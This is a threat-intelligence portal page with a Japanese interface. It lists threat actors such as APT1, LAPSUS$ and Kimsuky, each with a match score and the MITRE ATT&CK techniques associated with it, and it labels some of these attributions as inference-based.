  • T1059.012 - Hypervisor CLI
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

admin@338

Score: 4.02
Matched TTPs:
  • T1003.007 - Proc Filesystem
  • T1218.010 - Regsvr32
MITREへのリンク →

APT1

Score: 8.58
Matched TTPs:
  • T1003.007 - Proc Filesystem
  • T1136.002 - Domain Account
  • T1199 - Trusted Relationship
  • T1668 - Exclusive Control
MITREへのリンク →

INC Ransom

Score: 13.15
Matched TTPs:
  • T1036.009 - Break Process Trees
  • T1552.003 - Shell History
  • T1199 - Trusted Relationship
  • T1597 - Search Closed Sources
  • T1157 - Dylib Hijacking
  • T1027 - Obfuscated Files or Information
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

Velvet Ant

Score: 7.58
Matched TTPs:
  • T1036.009 - Break Process Trees
  • T1009 - Binary Padding
  • T1597 - Search Closed Sources
MITREへのリンク →

WIRTE

Score: 5.94
Matched TTPs:
  • T1059.010 - AutoHotKey & AutoIT
  • T1199 - Trusted Relationship
  • T1027.014 - Polymorphic Code
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

Gorgon Group

Score: 11.01
Matched TTPs:
  • T1059.010 - AutoHotKey & AutoIT
  • T1050 - New Service
  • T1199 - Trusted Relationship
  • T1597 - Search Closed Sources
  • T1553.004 - Install Root Certificate
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

Darkhotel

Score: 5.60
Matched TTPs:
  • T1059.010 - AutoHotKey & AutoIT
  • T1218.010 - Regsvr32
  • T1059.012 - Hypervisor CLI
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

Cinnamon Tempest

Score: 7.14
Matched TTPs:
  • T1059.010 - AutoHotKey & AutoIT
  • T1552.003 - Shell History
  • T1199 - Trusted Relationship
  • T1157 - Dylib Hijacking
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

Malteiro

Score: 6.14
Matched TTPs:
  • T1059.010 - AutoHotKey & AutoIT
  • T1562.012 - Disable or Modify Linux Audit System
  • T1552.003 - Shell History
MITREへのリンク →

TA2541

Score: 10.20
Matched TTPs:
  • T1091 - Replication Through Removable Media
  • T1136.002 - Domain Account
  • T1218.012 - Verclsid
  • T1199 - Trusted Relationship
  • T1597 - Search Closed Sources
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

SideCopy

Score: 5.09
Matched TTPs:
  • T1091 - Replication Through Removable Media
  • T1218.012 - Verclsid
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

BITTER

Score: 8.71
Matched TTPs:
  • T1091 - Replication Through Removable Media
  • T1199 - Trusted Relationship
  • T1683 - Generate Content
  • T1218.010 - Regsvr32
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

EXOTIC LILY

Score: 7.31
Matched TTPs:
  • T1091 - Replication Through Removable Media
  • T1690 - Prevent Command History Logging
  • T1218.010 - Regsvr32
MITREへのリンク →

APT42

Score: 12.63
Matched TTPs:
  • T1091 - Replication Through Removable Media
  • T1583.001 - Domains
  • T1562.012 - Disable or Modify Linux Audit System
  • T1199 - Trusted Relationship
  • T1132.002 - Non-Standard Encoding
MITREへのリンク →

Akira

Score: 12.62
Matched TTPs:
  • T1137.005 - Outlook Rules
  • T1552.003 - Shell History
  • T1597 - Search Closed Sources
  • T1157 - Dylib Hijacking
  • T1027 - Obfuscated Files or Information
MITREへのリンク →

Nomadic Octopus

Score: 5.36
Matched TTPs:
  • T1558 - Steal or Forge Kerberos Tickets
  • T1553.004 - Install Root Certificate
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

TA551

Score: 8.05
Matched TTPs:
  • T1558 - Steal or Forge Kerberos Tickets
  • T1218.012 - Verclsid
  • T1027.014 - Polymorphic Code
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

PLATINUM

Score: 9.27
Matched TTPs:
  • T1558 - Steal or Forge Kerberos Tickets
  • T1059.012 - Hypervisor CLI
  • T1547.013 - XDG Autostart Entries
  • T1686 - Disable or Modify System Firewall
MITREへのリンク →

Carbanak

Score: 4.61
Matched TTPs:
  • T1009 - Binary Padding
  • T1199 - Trusted Relationship
  • T1157 - Dylib Hijacking
MITREへのリンク →

ToddyCat

Score: 4.74
Matched TTPs:
  • T1009 - Binary Padding
  • T1553.004 - Install Root Certificate
MITREへのリンク →

APT33

Score: 6.60
Matched TTPs:
  • T1562.012 - Disable or Modify Linux Audit System
  • T1199 - Trusted Relationship
  • T1157 - Dylib Hijacking
  • T1218.010 - Regsvr32
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

LAPSUS$

Score: 22.52
Matched TTPs:
  • T1562.012 - Disable or Modify Linux Audit System
  • T1019 - System Firmware
  • T1136.002 - Domain Account
  • T1619 - Cloud Storage Object Discovery
  • T1199 - Trusted Relationship
  • T1157 - Dylib Hijacking
  • T1564.003 - Hidden Window
  • T1132.002 - Non-Standard Encoding
MITREへのリンク →

Inception

Score: 9.48
Matched TTPs:
  • T1562.012 - Disable or Modify Linux Audit System
  • T1218.012 - Verclsid
  • T1199 - Trusted Relationship
  • T1027.014 - Polymorphic Code
  • T1218.010 - Regsvr32
MITREへのリンク →

Deep Panda

Score: 8.43
Matched TTPs:
  • T1177 - LSASS Driver
  • T1027.014 - Polymorphic Code
  • T1553.004 - Install Root Certificate
MITREへのリンク →

Fox Kitten

Score: 11.96
Matched TTPs:
  • T1177 - LSASS Driver
  • T1542.004 - ROMMONkit
  • T1157 - Dylib Hijacking
  • T1656 - Impersonation
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

Metador

Score: 4.08
Matched TTPs:
  • T1136.002 - Domain Account
  • T1199 - Trusted Relationship
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

Andariel

Score: 6.49
Matched TTPs:
  • T1136.002 - Domain Account
  • T1218.010 - Regsvr32
  • T1059.012 - Hypervisor CLI
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

BackdoorDiplomacy

Score: 4.08
Matched TTPs:
  • T1136.002 - Domain Account
  • T1199 - Trusted Relationship
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

Confucius

Score: 6.58
Matched TTPs:
  • T1218.012 - Verclsid
  • T1087.004 - Cloud Account
  • T1218.010 - Regsvr32
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

Water Galura

Score: 4.86
Matched TTPs:
  • T1552.003 - Shell History
  • T1027 - Obfuscated Files or Information
MITREへのリンク →

FIN4

Score: 5.56
Matched TTPs:
  • T1574.010 - Services File Permissions Weakness
  • T1157 - Dylib Hijacking
MITREへのリンク →

Lotus Blossom

Score: 4.69
Matched TTPs:
  • T1199 - Trusted Relationship
  • T1505 - Server Software Component
MITREへのリンク →

CopyKittens

Score: 3.25
Matched TTPs:
  • T1199 - Trusted Relationship
  • T1553.004 - Install Root Certificate
MITREへのリンク →

Blue Mockingbird

Score: 7.44
Matched TTPs:
  • T1199 - Trusted Relationship
  • T1027.014 - Polymorphic Code
  • T1505 - Server Software Component
MITREへのリンク →

DarkHydrus

Score: 3.25
Matched TTPs:
  • T1199 - Trusted Relationship
  • T1553.004 - Install Root Certificate
MITREへのリンク →

Elderwood

Score: 4.04
Matched TTPs:
  • T1218.010 - Regsvr32
  • T1059.012 - Hypervisor CLI
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

APT17

Score: 3.44
Matched TTPs:
  • T1656 - Impersonation
MITREへのリンク →

Equation

Score: 4.13
Matched TTPs:
  • T1130 - Install Root Certificate
MITREへのリンク →

Strider

Score: 4.13
Matched TTPs:
  • T1130 - Install Root Certificate
MITREへのリンク →

このPulseに関連する脅威アクター (推論ベース)

Kimsuky

Score: 0.70
Matched TTPs:
  • T1055.014 - VDSO Hijacking
  • T1199 - Trusted Relationship
  • T1091 - Replication Through Removable Media
  • T1003.007 - Proc Filesystem
  • T1218.012 - Verclsid
  • T1553.004 - Install Root Certificate
  • T1566.002 - Spearphishing Link
  • T1597 - Search Closed Sources
  • T1552.003 - Shell History
  • T1668 - Exclusive Control
  • T1132.002 - Non-Standard Encoding
  • T1087.004 - Cloud Account
  • T1027.014 - Polymorphic Code
  • T1547.013 - XDG Autostart Entries
  • T1606.002 - SAML Tokens
  • T1009 - Binary Padding
  • T1562.012 - Disable or Modify Linux Audit System
  • T1059.010 - AutoHotKey & AutoIT
  • T1546.013 - PowerShell Profile
  • T1656 - Impersonation
  • T1690 - Prevent Command History Logging
MITREへのリンク →

Scattered Spider

Score: 0.69
Matched TTPs:
  • T1136.002 - Domain Account
  • T1199 - Trusted Relationship
  • T1027.002 - Software Packing
  • T1583.001 - Domains
  • T1597 - Search Closed Sources
  • T1204.001 - Malicious Link
  • T1552.003 - Shell History
  • T1087.004 - Cloud Account
  • T1027 - Obfuscated Files or Information
  • T1019 - System Firmware
  • T1157 - Dylib Hijacking
  • T1547.013 - XDG Autostart Entries
  • T1564.003 - Hidden Window
  • T1566.002 - Spearphishing Link
  • T1619 - Cloud Storage Object Discovery
  • T1685.004 - Disable or Modify Linux Audit System Log
  • T1218.005 - Mshta
MITREへのリンク →

Related CVEs

このPulseに見つかったCVEはありません。

Pulse – 脅威アクター グラフ

← Pulse一覧に戻る